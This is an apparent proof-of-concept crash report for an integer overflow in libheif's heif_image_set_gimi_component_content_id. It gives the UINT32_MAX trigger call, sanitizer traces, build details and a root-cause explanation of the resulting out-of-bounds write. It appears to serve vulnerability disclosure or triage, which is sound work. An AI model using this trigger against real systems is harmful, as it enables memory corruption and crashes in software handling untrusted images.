=== SF08 POC: Integer overflow in component_idx + 1 ===
Calling heif_image_set_gimi_component_content_id with component_idx=UINT32_MAX...
Expected crash: uint32 overflow at ids.resize(UINT32_MAX + 1) -> resize(0)
Then ids[UINT32_MAX] = content_id causes OOB write

/usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:1043:34: runtime error: applying non-zero offset 137438953440 to null pointer
    #0 0x7f0a8f0fd8c8 in std::vector<std::__cxx11::basic_string<char>>::operator[](unsigned long)
                       /usr/include/c++/9/bits/stl_vector.h:1043:34
    #1 0x7f0a8f0fd8c8 in heif_image_set_gimi_component_content_id
                       /src/libheif-latest/libheif/api/libheif/heif_uncompressed.cc:786:3
    #2 0x560f40073493 in main  /tmp/poc_trigger.cc:47:5
    #3 0x7f0a8e7ed082 in __libc_start_main

SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior stl_vector.h:1043:34

/usr/include/c++/9/bits/stl_vector.h:1043:9: runtime error: reference binding to address 0x001fffffffe0
  with insufficient space for an object of type 'std::basic_string<char>'
0x001fffffffe0: note: pointer points here
<memory cannot be printed>
    #0 0x7f0a8f0fd8e0 in std::vector<std::__cxx11::basic_string<char>>::operator[](unsigned long)
                       /usr/include/c++/9/bits/stl_vector.h:1043:2
    #1 0x7f0a8f0fd8e0 in heif_image_set_gimi_component_content_id
                       /src/libheif-latest/libheif/api/libheif/heif_uncompressed.cc:786:3
    #2 0x560f40073493 in main  /tmp/poc_trigger.cc:47:5

SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior stl_vector.h:1043:9

AddressSanitizer:DEADLYSIGNAL
=================================================================
==622==ERROR: AddressSanitizer: SEGV on unknown address 0x00047fff7ffd
    (pc 0x7f0a8f0fd63e bp 0x7ffe96c4a4f0 sp 0x7ffe96c4a440 T0)
==622==The signal is caused by a READ memory access.
    #0 0x7f0a8f0fd63e in std::__cxx11::basic_string<char>::size() const
                       /usr/include/c++/9/bits/basic_string.h:935:16
    #1 0x7f0a8f0fd63e in std::__cxx11::basic_string<char>::assign(char const*)
                       /usr/include/c++/9/bits/basic_string.h:1442:40
    #2 0x7f0a8f0fd63e in heif_image_set_gimi_component_content_id
                       /src/libheif-latest/libheif/api/libheif/heif_uncompressed.cc:786:22
    #3 0x560f40073493 in main  /tmp/poc_trigger.cc:47:5
    #4 0x7f0a8e7ed082 in __libc_start_main

==622==Register values:
rax = 0x00000003fffffffd  rbx = 0x00007ffe96c4a440
rcx = 0x0000000000000000  rdx = 0x0000000000000000
rdi = 0x0000001fffffffe8  rsi = 0x0000000000000000

SUMMARY: AddressSanitizer: SEGV
  /src/libheif-latest/libheif/api/libheif/heif_uncompressed.cc:786:22
  in heif_image_set_gimi_component_content_id

--- Environment ---
libheif commit : f20a88baec0f34825cc076b3dfb2578fb2d5728c (master, 2026-04-17)
Build flags    : clang -fsanitize=address,undefined -fno-omit-frame-pointer -g -O1
                 -DWITH_UNCOMPRESSED_CODEC=ON
Confirmed on   : 2026-04-17
Trigger        : heif_image_set_gimi_component_content_id(img, UINT32_MAX, "poc-content-id")
Root cause     : UINT32_MAX + 1 overflows to 0 in uint32_t arithmetic;
                 ids.resize(0) makes the vector empty;
                 ids[UINT32_MAX] writes ~136 GiB past the vector's start
